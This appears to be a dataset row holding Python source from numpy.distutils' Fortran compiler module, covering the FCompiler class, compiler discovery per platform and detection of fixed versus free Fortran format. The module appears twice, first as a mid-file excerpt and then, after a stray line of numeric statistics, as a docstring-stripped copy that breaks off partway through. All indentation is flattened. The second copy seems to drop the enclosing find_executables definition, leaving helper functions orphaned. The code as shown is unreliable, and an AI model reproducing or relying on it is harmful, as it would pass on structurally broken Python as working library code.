linker_exe = self.linker_exe
if linker_exe:
linker_exe_flags = self.flag_vars.linker_exe
self.set_commands(linker_exe=linker_exe+linker_exe_flags)
ar = self.command_vars.archiver
if ar:
arflags = self.flag_vars.ar
self.set_commands(archiver=[ar]+arflags)
self.set_library_dirs(self.get_library_dirs())
self.set_libraries(self.get_libraries())
def dump_properties(self):
"""Print out the attributes of a compiler instance."""
props = []
for key in list(self.executables.keys()) + \
['version', 'libraries', 'library_dirs',
'object_switch', 'compile_switch']:
if hasattr(self, key):
v = getattr(self, key)
props.append((key, None, '= '+repr(v)))
props.sort()
pretty_printer = FancyGetopt(props)
for l in pretty_printer.generate_help("%s instance properties:" \
% (self.__class__.__name__)):
if l[:4]==' --':
l = ' ' + l[4:]
print(l)
###################
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
"""Compile 'src' to product 'obj'."""
src_flags = {}
if is_f_file(src) and not has_f90_header(src):
flavor = ':f77'
compiler = self.compiler_f77
src_flags = get_f77flags(src)
extra_compile_args = self.extra_f77_compile_args or []
elif is_free_format(src):
flavor = ':f90'
compiler = self.compiler_f90
if compiler is None:
raise DistutilsExecError('f90 not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
else:
flavor = ':fix'
compiler = self.compiler_fix
if compiler is None:
raise DistutilsExecError('f90 (fixed) not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
if self.object_switch[-1]==' ':
o_args = [self.object_switch.strip(), obj]
else:
o_args = [self.object_switch.strip()+obj]
assert self.compile_switch.strip()
s_args = [self.compile_switch, src]
if extra_compile_args:
log.info('extra %s options: %r' \
% (flavor[1:], ' '.join(extra_compile_args)))
extra_flags = src_flags.get(self.compiler_type, [])
if extra_flags:
log.info('using compile options from source: %r' \
% ' '.join(extra_flags))
command = compiler + cc_args + extra_flags + s_args + o_args \
+ extra_postargs + extra_compile_args
display = '%s: %s' % (os.path.basename(compiler[0]) + flavor,
src)
try:
self.spawn(command, display=display)
except DistutilsExecError as e:
msg = str(e)
raise CompileError(msg)
def module_options(self, module_dirs, module_build_dir):
options = []
if self.module_dir_switch is not None:
if self.module_dir_switch[-1]==' ':
options.extend([self.module_dir_switch.strip(), module_build_dir])
else:
options.append(self.module_dir_switch.strip()+module_build_dir)
else:
print('XXX: module_build_dir=%r option ignored' % (module_build_dir))
print('XXX: Fix module_dir_switch for ', self.__class__.__name__)
if self.module_include_switch is not None:
for d in [module_build_dir]+module_dirs:
options.append('%s%s' % (self.module_include_switch, d))
else:
print('XXX: module_dirs=%r option ignored' % (module_dirs))
print('XXX: Fix module_include_switch for ', self.__class__.__name__)
return options
def library_option(self, lib):
return "-l" + lib
def library_dir_option(self, dir):
return "-L" + dir
def link(self, target_desc, objects,
output_filename, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
libraries, library_dirs, runtime_library_dirs = \
self._fix_lib_args(libraries, library_dirs, runtime_library_dirs)
lib_opts = gen_lib_options(self, library_dirs, runtime_library_dirs,
libraries)
if is_string(output_dir):
output_filename = os.path.join(output_dir, output_filename)
elif output_dir is not None:
raise TypeError("'output_dir' must be a string or None")
if self._need_link(objects, output_filename):
if self.library_switch[-1]==' ':
o_args = [self.library_switch.strip(), output_filename]
else:
o_args = [self.library_switch.strip()+output_filename]
if is_string(self.objects):
ld_args = objects + [self.objects]
else:
ld_args = objects + self.objects
ld_args = ld_args + lib_opts + o_args
if debug:
ld_args[:0] = ['-g']
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
if target_desc == CCompiler.EXECUTABLE:
linker = self.linker_exe[:]
else:
linker = self.linker_so[:]
command = linker + ld_args
try:
self.spawn(command)
except DistutilsExecError as e:
msg = str(e)
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def _environment_hook(self, name, hook_name):
if hook_name is None:
return None
if is_string(hook_name):
if hook_name.startswith('self.'):
hook_name = hook_name[5:]
hook = getattr(self, hook_name)
return hook()
elif hook_name.startswith('exe.'):
hook_name = hook_name[4:]
var = self.executables[hook_name]
if var:
return var[0]
else:
return None
elif hook_name.startswith('flags.'):
hook_name = hook_name[6:]
hook = getattr(self, 'get_flags_' + hook_name)
return hook()
else:
return hook_name()
def can_ccompiler_link(self, ccompiler):
"""
Check if the given C compiler can link objects produced by
this compiler.
"""
return True
def wrap_unlinkable_objects(self, objects, output_dir, extra_dll_dir):
"""
Convert a set of object files that are not compatible with the default
linker, to a file that is compatible.
Parameters
----------
objects : list
List of object files to include.
output_dir : str
Output directory to place generated object files.
extra_dll_dir : str
Output directory to place extra DLL files that need to be
included on Windows.
Returns
-------
converted_objects : list of str
List of converted object files.
Note that the number of output files is not necessarily
the same as inputs.
"""
raise NotImplementedError()
## class FCompiler
_default_compilers = (
# sys.platform mappings
('win32', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95',
'intelvem', 'intelem', 'flang')),
('cygwin.*', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95')),
('linux.*', ('gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq',
'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor')),
('darwin.*', ('gnu95', 'nag', 'absoft', 'ibm', 'intel', 'gnu', 'g95', 'pg')),
('sunos.*', ('sun', 'gnu', 'gnu95', 'g95')),
('irix.*', ('mips', 'gnu', 'gnu95',)),
('aix.*', ('ibm', 'gnu', 'gnu95',)),
# os.name mappings
('posix', ('gnu', 'gnu95',)),
('nt', ('gnu', 'gnu95',)),
('mac', ('gnu95', 'gnu', 'pg')),
)
fcompiler_class = None
fcompiler_aliases = None
def load_all_fcompiler_classes():
"""Cache all the FCompiler classes found in modules in the
numpy.distutils.fcompiler package.
"""
from glob import glob
global fcompiler_class, fcompiler_aliases
if fcompiler_class is not None:
return
pys = os.path.join(os.path.dirname(__file__), '*.py')
fcompiler_class = {}
fcompiler_aliases = {}
for fname in glob(pys):
module_name, ext = os.path.splitext(os.path.basename(fname))
module_name = 'numpy.distutils.fcompiler.' + module_name
__import__ (module_name)
module = sys.modules[module_name]
if hasattr(module, 'compilers'):
for cname in module.compilers:
klass = getattr(module, cname)
desc = (klass.compiler_type, klass, klass.description)
fcompiler_class[klass.compiler_type] = desc
for alias in klass.compiler_aliases:
if alias in fcompiler_aliases:
raise ValueError("alias %r defined for both %s and %s"
% (alias, klass.__name__,
fcompiler_aliases[alias][1].__name__))
fcompiler_aliases[alias] = desc
def _find_existing_fcompiler(compiler_types,
osname=None, platform=None,
requiref90=False,
c_compiler=None):
from numpy.distutils.core import get_distribution
dist = get_distribution(always=True)
for compiler_type in compiler_types:
v = None
try:
c = new_fcompiler(plat=platform, compiler=compiler_type,
c_compiler=c_compiler)
c.customize(dist)
v = c.get_version()
if requiref90 and c.compiler_f90 is None:
v = None
new_compiler = c.suggested_f90_compiler
if new_compiler:
log.warn('Trying %r compiler as suggested by %r '
'compiler for f90 support.' % (compiler_type,
new_compiler))
c = new_fcompiler(plat=platform, compiler=new_compiler,
c_compiler=c_compiler)
c.customize(dist)
v = c.get_version()
if v is not None:
compiler_type = new_compiler
if requiref90 and c.compiler_f90 is None:
raise ValueError('%s does not support compiling f90 codes, '
'skipping.' % (c.__class__.__name__))
except DistutilsModuleError:
log.debug("_find_existing_fcompiler: compiler_type='%s' raised DistutilsModuleError", compiler_type)
except CompilerNotFound:
log.debug("_find_existing_fcompiler: compiler_type='%s' not found", compiler_type)
if v is not None:
return compiler_type
return None
def available_fcompilers_for_platform(osname=None, platform=None):
if osname is None:
osname = os.name
if platform is None:
platform = sys.platform
matching_compiler_types = []
for pattern, compiler_type in _default_compilers:
if re.match(pattern, platform) or re.match(pattern, osname):
for ct in compiler_type:
if ct not in matching_compiler_types:
matching_compiler_types.append(ct)
if not matching_compiler_types:
matching_compiler_types.append('gnu')
return matching_compiler_types
def get_default_fcompiler(osname=None, platform=None, requiref90=False,
c_compiler=None):
"""Determine the default Fortran compiler to use for the given
platform."""
matching_compiler_types = available_fcompilers_for_platform(osname,
platform)
log.info("get_default_fcompiler: matching types: '%s'",
matching_compiler_types)
compiler_type = _find_existing_fcompiler(matching_compiler_types,
osname=osname,
platform=platform,
requiref90=requiref90,
c_compiler=c_compiler)
return compiler_type
# Flag to avoid rechecking for Fortran compiler every time
failed_fcompilers = set()
def new_fcompiler(plat=None,
compiler=None,
verbose=0,
dry_run=0,
force=0,
requiref90=False,
c_compiler = None):
"""Generate an instance of some FCompiler subclass for the supplied
platform/compiler combination.
"""
global failed_fcompilers
fcompiler_key = (plat, compiler)
if fcompiler_key in failed_fcompilers:
return None
load_all_fcompiler_classes()
if plat is None:
plat = os.name
if compiler is None:
compiler = get_default_fcompiler(plat, requiref90=requiref90,
c_compiler=c_compiler)
if compiler in fcompiler_class:
module_name, klass, long_description = fcompiler_class[compiler]
elif compiler in fcompiler_aliases:
module_name, klass, long_description = fcompiler_aliases[compiler]
else:
msg = "don't know how to compile Fortran code on platform '%s'" % plat
if compiler is not None:
msg = msg + " with '%s' compiler." % compiler
msg = msg + " Supported compilers are: %s)" \
% (','.join(fcompiler_class.keys()))
log.warn(msg)
failed_fcompilers.add(fcompiler_key)
return None
compiler = klass(verbose=verbose, dry_run=dry_run, force=force)
compiler.c_compiler = c_compiler
return compiler
def show_fcompilers(dist=None):
"""Print list of available compilers (used by the "--help-fcompiler"
option to "config_fc").
"""
if dist is None:
from distutils.dist import Distribution
from numpy.distutils.command.config_compiler import config_fc
dist = Distribution()
dist.script_name = os.path.basename(sys.argv[0])
dist.script_args = ['config_fc'] + sys.argv[1:]
try:
dist.script_args.remove('--help-fcompiler')
except ValueError:
pass
dist.cmdclass['config_fc'] = config_fc
dist.parse_config_files()
dist.parse_command_line()
compilers = []
compilers_na = []
compilers_ni = []
if not fcompiler_class:
load_all_fcompiler_classes()
platform_compilers = available_fcompilers_for_platform()
for compiler in platform_compilers:
v = None
log.set_verbosity(-2)
try:
c = new_fcompiler(compiler=compiler, verbose=dist.verbose)
c.customize(dist)
v = c.get_version()
except (DistutilsModuleError, CompilerNotFound) as e:
log.debug("show_fcompilers: %s not found" % (compiler,))
log.debug(repr(e))
if v is None:
compilers_na.append(("fcompiler="+compiler, None,
fcompiler_class[compiler][2]))
else:
c.dump_properties()
compilers.append(("fcompiler="+compiler, None,
fcompiler_class[compiler][2] + ' (%s)' % v))
compilers_ni = list(set(fcompiler_class.keys()) - set(platform_compilers))
compilers_ni = [("fcompiler="+fc, None, fcompiler_class[fc][2])
for fc in compilers_ni]
compilers.sort()
compilers_na.sort()
compilers_ni.sort()
pretty_printer = FancyGetopt(compilers)
pretty_printer.print_help("Fortran compilers found:")
pretty_printer = FancyGetopt(compilers_na)
pretty_printer.print_help("Compilers available for this "
"platform, but not found:")
if compilers_ni:
pretty_printer = FancyGetopt(compilers_ni)
pretty_printer.print_help("Compilers not available on this platform:")
print("For compiler details, run 'config_fc --verbose' setup command.")
def dummy_fortran_file():
fo, name = make_temp_file(suffix='.f')
fo.write(" subroutine dummy()\n end\n")
fo.close()
return name[:-2]
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*!]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
"""Check if file is in free format Fortran."""
# f90 allows both fixed and free format, assuming fixed unless
# signs of free format are detected.
result = 0
f = open_latin1(file, 'r')
line = f.readline()
n = 10000 # the number of non-comment lines to scan for hints
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n>0 and line:
line = line.rstrip()
if line and line[0]!='!':
n -= 1
if (line[0]!='\t' and _free_f90_start(line[:5])) or line[-1:]=='&':
result = 1
break
line = f.readline()
f.close()
return result
def has_f90_header(src):
f = open_latin1(src, 'r')
line = f.readline()
f.close()
return _has_f90_header(line) or _has_fix_header(line)
_f77flags_re = re.compile(r'(c|)f77flags\s*\(\s*(?P<fcname>\w+)\s*\)\s*=\s*(?P<fflags>.*)', re.I)
def get_f77flags(src):
"""
Search the first 20 lines of fortran 77 code for line pattern
`CF77FLAGS(<fcompiler type>)=<f77 flags>`
Return a dictionary {<fcompiler type>:<f77 flags>}.
"""
flags = {}
f = open_latin1(src, 'r')
i = 0
for line in f:
i += 1
if i>20: break
m = _f77flags_re.match(line)
if not m: continue
fcname = m.group('fcname').strip()
fflags = m.group('fflags').strip()
flags[fcname] = split_quoted(fflags)
f.close()
return flags
# TODO: implement get_f90flags and use it in _compile similarly to get_f77flags
if __name__ == '__main__':
show_fcompilers()
| 38.894942 | 112 | 0.595538 | __all__ = ['FCompiler', 'new_fcompiler', 'show_fcompilers',
'dummy_fortran_file']
import os
import sys
import re
from numpy.compat import open_latin1
from distutils.sysconfig import get_python_lib
from distutils.fancy_getopt import FancyGetopt
from distutils.errors import DistutilsModuleError, \
DistutilsExecError, CompileError, LinkError, DistutilsPlatformError
from distutils.util import split_quoted, strtobool
from numpy.distutils.ccompiler import CCompiler, gen_lib_options
from numpy.distutils import log
from numpy.distutils.misc_util import is_string, all_strings, is_sequence, \
make_temp_file, get_shared_lib_extension
from numpy.distutils.exec_command import find_executable
from numpy.distutils import _shell_utils
from .environment import EnvironmentConfig
__metaclass__ = type
class CompilerNotFound(Exception):
pass
def flaglist(s):
if is_string(s):
return split_quoted(s)
else:
return s
def str2bool(s):
if is_string(s):
return strtobool(s)
return bool(s)
def is_sequence_of_strings(seq):
return is_sequence(seq) and all_strings(seq)
class FCompiler(CCompiler):
distutils_vars = EnvironmentConfig(
distutils_section='config_fc',
noopt = (None, None, 'noopt', str2bool, False),
noarch = (None, None, 'noarch', str2bool, False),
debug = (None, None, 'debug', str2bool, False),
verbose = (None, None, 'verbose', str2bool, False),
)
command_vars = EnvironmentConfig(
distutils_section='config_fc',
compiler_f77 = ('exe.compiler_f77', 'F77', 'f77exec', None, False),
compiler_f90 = ('exe.compiler_f90', 'F90', 'f90exec', None, False),
compiler_fix = ('exe.compiler_fix', 'F90', 'f90exec', None, False),
version_cmd = ('exe.version_cmd', None, None, None, False),
linker_so = ('exe.linker_so', 'LDSHARED', 'ldshared', None, False),
linker_exe = ('exe.linker_exe', 'LD', 'ld', None, False),
archiver = (None, 'AR', 'ar', None, False),
ranlib = (None, 'RANLIB', 'ranlib', None, False),
)
flag_vars = EnvironmentConfig(
distutils_section='config_fc',
f77 = ('flags.f77', 'F77FLAGS', 'f77flags', flaglist, True),
f90 = ('flags.f90', 'F90FLAGS', 'f90flags', flaglist, True),
free = ('flags.free', 'FREEFLAGS', 'freeflags', flaglist, True),
fix = ('flags.fix', None, None, flaglist, False),
opt = ('flags.opt', 'FOPT', 'opt', flaglist, True),
opt_f77 = ('flags.opt_f77', None, None, flaglist, False),
opt_f90 = ('flags.opt_f90', None, None, flaglist, False),
arch = ('flags.arch', 'FARCH', 'arch', flaglist, False),
arch_f77 = ('flags.arch_f77', None, None, flaglist, False),
arch_f90 = ('flags.arch_f90', None, None, flaglist, False),
debug = ('flags.debug', 'FDEBUG', 'fdebug', flaglist, True),
debug_f77 = ('flags.debug_f77', None, None, flaglist, False),
debug_f90 = ('flags.debug_f90', None, None, flaglist, False),
flags = ('self.get_flags', 'FFLAGS', 'fflags', flaglist, True),
linker_so = ('flags.linker_so', 'LDFLAGS', 'ldflags', flaglist, True),
linker_exe = ('flags.linker_exe', 'LDFLAGS', 'ldflags', flaglist, True),
ar = ('flags.ar', 'ARFLAGS', 'arflags', flaglist, True),
)
language_map = {'.f': 'f77',
'.for': 'f77',
'.F': 'f77',
'.ftn': 'f77',
'.f77': 'f77',
'.f90': 'f90',
'.F90': 'f90',
'.f95': 'f90',
}
language_order = ['f90', 'f77']
compiler_type = None
compiler_aliases = ()
version_pattern = None
possible_executables = []
executables = {
'version_cmd': ["f77", "-v"],
'compiler_f77': ["f77"],
'compiler_f90': ["f90"],
'compiler_fix': ["f90", "-fixed"],
'linker_so': ["f90", "-shared"],
'linker_exe': ["f90"],
'archiver': ["ar", "-cr"],
'ranlib': None,
}
suggested_f90_compiler = None
compile_switch = "-c"
object_switch = "-o "
library_switch = "-o "
module_dir_switch = None
module_include_switch = '-I'
pic_flags = []
src_extensions = ['.for', '.ftn', '.f77', '.f', '.f90', '.f95', '.F', '.F90', '.FOR']
obj_extension = ".o"
shared_lib_extension = get_shared_lib_extension()
static_lib_extension = ".a"
static_lib_format = "lib%s%s"
shared_lib_format = "%s%s"
exe_extension = ""
_exe_cache = {}
_executable_keys = ['version_cmd', 'compiler_f77', 'compiler_f90',
'compiler_fix', 'linker_so', 'linker_exe', 'archiver',
'ranlib']
c_compiler = None
extra_f77_compile_args = []
extra_f90_compile_args = []
def __init__(self, *args, **kw):
CCompiler.__init__(self, *args, **kw)
self.distutils_vars = self.distutils_vars.clone(self._environment_hook)
self.command_vars = self.command_vars.clone(self._environment_hook)
self.flag_vars = self.flag_vars.clone(self._environment_hook)
self.executables = self.executables.copy()
for e in self._executable_keys:
if e not in self.executables:
self.executables[e] = None
self._is_customised = False
def __copy__(self):
obj = self.__new__(self.__class__)
obj.__dict__.update(self.__dict__)
obj.distutils_vars = obj.distutils_vars.clone(obj._environment_hook)
obj.command_vars = obj.command_vars.clone(obj._environment_hook)
obj.flag_vars = obj.flag_vars.clone(obj._environment_hook)
obj.executables = obj.executables.copy()
return obj
def copy(self):
return self.__copy__()
# Use properties for the attributes used by CCompiler. Setting them
# as attributes from the self.executables dictionary is error-prone,
# so we get them from there each time.
def _command_property(key):
def fget(self):
assert self._is_customised
return self.executables[key]
return property(fget=fget)
version_cmd = _command_property('version_cmd')
compiler_f77 = _command_property('compiler_f77')
compiler_f90 = _command_property('compiler_f90')
compiler_fix = _command_property('compiler_fix')
linker_so = _command_property('linker_so')
linker_exe = _command_property('linker_exe')
archiver = _command_property('archiver')
ranlib = _command_property('ranlib')
# Make our terminology consistent.
def set_executable(self, key, value):
self.set_command(key, value)
def set_commands(self, **kw):
for k, v in kw.items():
self.set_command(k, v)
def set_command(self, key, value):
if not key in self._executable_keys:
raise ValueError(
"unknown executable '%s' for class %s" %
(key, self.__class__.__name__))
if is_string(value):
value = split_quoted(value)
assert value is None or is_sequence_of_strings(value[1:]), (key, value)
self.executables[key] = value
######################################################################
## Methods that subclasses may redefine. But don't call these methods!
def cached_find_executable(exe):
if exe in exe_cache:
return exe_cache[exe]
fc_exe = find_executable(exe)
exe_cache[exe] = exe_cache[fc_exe] = fc_exe
return fc_exe
def verify_command_form(name, value):
if value is not None and not is_sequence_of_strings(value):
raise ValueError(
"%s value %r is invalid in class %s" %
(name, value, self.__class__.__name__))
def set_exe(exe_key, f77=None, f90=None):
cmd = self.executables.get(exe_key, None)
if not cmd:
return None
# have anything set
exe_from_environ = getattr(self.command_vars, exe_key)
if not exe_from_environ:
possibles = [f90, f77] + self.possible_executables
else:
possibles = [exe_from_environ] + self.possible_executables
seen = set()
unique_possibles = []
for e in possibles:
if e == '<F77>':
e = f77
elif e == '<F90>':
e = f90
if not e or e in seen:
continue
seen.add(e)
unique_possibles.append(e)
for exe in unique_possibles:
fc_exe = cached_find_executable(exe)
if fc_exe:
cmd[0] = fc_exe
return fc_exe
self.set_command(exe_key, None)
return None
ctype = self.compiler_type
f90 = set_exe('compiler_f90')
if not f90:
f77 = set_exe('compiler_f77')
if f77:
log.warn('%s: no Fortran 90 compiler found' % ctype)
else:
raise CompilerNotFound('%s: f90 nor f77' % ctype)
else:
f77 = set_exe('compiler_f77', f90=f90)
if not f77:
log.warn('%s: no Fortran 77 compiler found' % ctype)
set_exe('compiler_fix', f90=f90)
set_exe('linker_so', f77=f77, f90=f90)
set_exe('linker_exe', f77=f77, f90=f90)
set_exe('version_cmd', f77=f77, f90=f90)
set_exe('archiver')
set_exe('ranlib')
def update_executables(self):
pass
def get_flags(self):
return [] + self.pic_flags
def _get_command_flags(self, key):
cmd = self.executables.get(key, None)
if cmd is None:
return []
return cmd[1:]
def get_flags_f77(self):
return self._get_command_flags('compiler_f77')
def get_flags_f90(self):
return self._get_command_flags('compiler_f90')
def get_flags_free(self):
return []
def get_flags_fix(self):
return self._get_command_flags('compiler_fix')
def get_flags_linker_so(self):
return self._get_command_flags('linker_so')
def get_flags_linker_exe(self):
return self._get_command_flags('linker_exe')
def get_flags_ar(self):
return self._get_command_flags('archiver')
def get_flags_opt(self):
return []
def get_flags_arch(self):
return []
def get_flags_debug(self):
return []
get_flags_opt_f77 = get_flags_opt_f90 = get_flags_opt
get_flags_arch_f77 = get_flags_arch_f90 = get_flags_arch
get_flags_debug_f77 = get_flags_debug_f90 = get_flags_debug
def get_libraries(self):
return self.libraries[:]
def get_library_dirs(self):
return self.library_dirs[:]
def get_version(self, force=False, ok_status=[0]):
assert self._is_customised
version = CCompiler.get_version(self, force=force, ok_status=ok_status)
if version is None:
raise CompilerNotFound()
return version
############################################################
## Public methods:
def customize(self, dist = None):
log.info('customize %s' % (self.__class__.__name__))
self._is_customised = True
self.distutils_vars.use_distribution(dist)
self.command_vars.use_distribution(dist)
self.flag_vars.use_distribution(dist)
self.update_executables()
# find_executables takes care of setting the compiler commands,
# version_cmd, linker_so, linker_exe, ar, and ranlib
self.find_executables()
noopt = self.distutils_vars.get('noopt', False)
noarch = self.distutils_vars.get('noarch', noopt)
debug = self.distutils_vars.get('debug', False)
f77 = self.command_vars.compiler_f77
f90 = self.command_vars.compiler_f90
f77flags = []
f90flags = []
freeflags = []
fixflags = []
if f77:
f77 = _shell_utils.NativeParser.split(f77)
f77flags = self.flag_vars.f77
if f90:
f90 = _shell_utils.NativeParser.split(f90)
f90flags = self.flag_vars.f90
freeflags = self.flag_vars.free
# XXX Assuming that free format is default for f90 compiler.
fix = self.command_vars.compiler_fix
# NOTE: this and similar examples are probably just
# excluding --coverage flag when F90 = gfortran --coverage
# instead of putting that flag somewhere more appropriate
# this and similar examples where a Fortran compiler
# environment variable has been customized by CI or a user
# should perhaps eventually be more thoroughly tested and more
# robustly handled
if fix:
fix = _shell_utils.NativeParser.split(fix)
fixflags = self.flag_vars.fix + f90flags
oflags, aflags, dflags = [], [], []
# examine get_flags_<tag>_<compiler> for extra flags
# only add them if the method is different from get_flags_<tag>
def get_flags(tag, flags):
# note that self.flag_vars.<tag> calls self.get_flags_<tag>()
flags.extend(getattr(self.flag_vars, tag))
this_get = getattr(self, 'get_flags_' + tag)
for name, c, flagvar in [('f77', f77, f77flags),
('f90', f90, f90flags),
('f90', fix, fixflags)]:
t = '%s_%s' % (tag, name)
if c and this_get is not getattr(self, 'get_flags_' + t):
flagvar.extend(getattr(self.flag_vars, t))
if not noopt:
get_flags('opt', oflags)
if not noarch:
get_flags('arch', aflags)
if debug:
get_flags('debug', dflags)
fflags = self.flag_vars.flags + dflags + oflags + aflags
if f77:
self.set_commands(compiler_f77=f77+f77flags+fflags)
if f90:
self.set_commands(compiler_f90=f90+freeflags+f90flags+fflags)
if fix:
self.set_commands(compiler_fix=fix+fixflags+fflags)
#XXX: Do we need LDSHARED->SOSHARED, LDFLAGS->SOFLAGS
linker_so = self.linker_so
if linker_so:
linker_so_flags = self.flag_vars.linker_so
if sys.platform.startswith('aix'):
python_lib = get_python_lib(standard_lib=1)
ld_so_aix = os.path.join(python_lib, 'config', 'ld_so_aix')
python_exp = os.path.join(python_lib, 'config', 'python.exp')
linker_so = [ld_so_aix] + linker_so + ['-bI:'+python_exp]
self.set_commands(linker_so=linker_so+linker_so_flags)
linker_exe = self.linker_exe
if linker_exe:
linker_exe_flags = self.flag_vars.linker_exe
self.set_commands(linker_exe=linker_exe+linker_exe_flags)
ar = self.command_vars.archiver
if ar:
arflags = self.flag_vars.ar
self.set_commands(archiver=[ar]+arflags)
self.set_library_dirs(self.get_library_dirs())
self.set_libraries(self.get_libraries())
def dump_properties(self):
props = []
for key in list(self.executables.keys()) + \
['version', 'libraries', 'library_dirs',
'object_switch', 'compile_switch']:
if hasattr(self, key):
v = getattr(self, key)
props.append((key, None, '= '+repr(v)))
props.sort()
pretty_printer = FancyGetopt(props)
for l in pretty_printer.generate_help("%s instance properties:" \
% (self.__class__.__name__)):
if l[:4]==' --':
l = ' ' + l[4:]
print(l)
###################
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
src_flags = {}
if is_f_file(src) and not has_f90_header(src):
flavor = ':f77'
compiler = self.compiler_f77
src_flags = get_f77flags(src)
extra_compile_args = self.extra_f77_compile_args or []
elif is_free_format(src):
flavor = ':f90'
compiler = self.compiler_f90
if compiler is None:
raise DistutilsExecError('f90 not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
else:
flavor = ':fix'
compiler = self.compiler_fix
if compiler is None:
raise DistutilsExecError('f90 (fixed) not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
if self.object_switch[-1]==' ':
o_args = [self.object_switch.strip(), obj]
else:
o_args = [self.object_switch.strip()+obj]
assert self.compile_switch.strip()
s_args = [self.compile_switch, src]
if extra_compile_args:
log.info('extra %s options: %r' \
% (flavor[1:], ' '.join(extra_compile_args)))
extra_flags = src_flags.get(self.compiler_type, [])
if extra_flags:
log.info('using compile options from source: %r' \
% ' '.join(extra_flags))
command = compiler + cc_args + extra_flags + s_args + o_args \
+ extra_postargs + extra_compile_args
display = '%s: %s' % (os.path.basename(compiler[0]) + flavor,
src)
try:
self.spawn(command, display=display)
except DistutilsExecError as e:
msg = str(e)
raise CompileError(msg)
def module_options(self, module_dirs, module_build_dir):
options = []
if self.module_dir_switch is not None:
if self.module_dir_switch[-1]==' ':
options.extend([self.module_dir_switch.strip(), module_build_dir])
else:
options.append(self.module_dir_switch.strip()+module_build_dir)
else:
print('XXX: module_build_dir=%r option ignored' % (module_build_dir))
print('XXX: Fix module_dir_switch for ', self.__class__.__name__)
if self.module_include_switch is not None:
for d in [module_build_dir]+module_dirs:
options.append('%s%s' % (self.module_include_switch, d))
else:
print('XXX: module_dirs=%r option ignored' % (module_dirs))
print('XXX: Fix module_include_switch for ', self.__class__.__name__)
return options
def library_option(self, lib):
return "-l" + lib
def library_dir_option(self, dir):
return "-L" + dir
def link(self, target_desc, objects,
output_filename, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None,
export_symbols=None, debug=0, extra_preargs=None,
extra_postargs=None, build_temp=None, target_lang=None):
objects, output_dir = self._fix_object_args(objects, output_dir)
libraries, library_dirs, runtime_library_dirs = \
self._fix_lib_args(libraries, library_dirs, runtime_library_dirs)
lib_opts = gen_lib_options(self, library_dirs, runtime_library_dirs,
libraries)
if is_string(output_dir):
output_filename = os.path.join(output_dir, output_filename)
elif output_dir is not None:
raise TypeError("'output_dir' must be a string or None")
if self._need_link(objects, output_filename):
if self.library_switch[-1]==' ':
o_args = [self.library_switch.strip(), output_filename]
else:
o_args = [self.library_switch.strip()+output_filename]
if is_string(self.objects):
ld_args = objects + [self.objects]
else:
ld_args = objects + self.objects
ld_args = ld_args + lib_opts + o_args
if debug:
ld_args[:0] = ['-g']
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
if target_desc == CCompiler.EXECUTABLE:
linker = self.linker_exe[:]
else:
linker = self.linker_so[:]
command = linker + ld_args
try:
self.spawn(command)
except DistutilsExecError as e:
msg = str(e)
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def _environment_hook(self, name, hook_name):
if hook_name is None:
return None
if is_string(hook_name):
if hook_name.startswith('self.'):
hook_name = hook_name[5:]
hook = getattr(self, hook_name)
return hook()
elif hook_name.startswith('exe.'):
hook_name = hook_name[4:]
var = self.executables[hook_name]
if var:
return var[0]
else:
return None
elif hook_name.startswith('flags.'):
hook_name = hook_name[6:]
hook = getattr(self, 'get_flags_' + hook_name)
return hook()
else:
return hook_name()
def can_ccompiler_link(self, ccompiler):
return True
def wrap_unlinkable_objects(self, objects, output_dir, extra_dll_dir):
raise NotImplementedError()
## class FCompiler
_default_compilers = (
# sys.platform mappings
('win32', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95',
'intelvem', 'intelem', 'flang')),
('cygwin.*', ('gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95')),
('linux.*', ('gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq',
'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor')),
('darwin.*', ('gnu95', 'nag', 'absoft', 'ibm', 'intel', 'gnu', 'g95', 'pg')),
('sunos.*', ('sun', 'gnu', 'gnu95', 'g95')),
('irix.*', ('mips', 'gnu', 'gnu95',)),
('aix.*', ('ibm', 'gnu', 'gnu95',)),
# os.name mappings
('posix', ('gnu', 'gnu95',)),
('nt', ('gnu', 'gnu95',)),
('mac', ('gnu95', 'gnu', 'pg')),
)
fcompiler_class = None
fcompiler_aliases = None
def load_all_fcompiler_classes():
from glob import glob
global fcompiler_class, fcompiler_aliases
if fcompiler_class is not None:
return
pys = os.path.join(os.path.dirname(__file__), '*.py')
fcompiler_class = {}
fcompiler_aliases = {}
for fname in glob(pys):
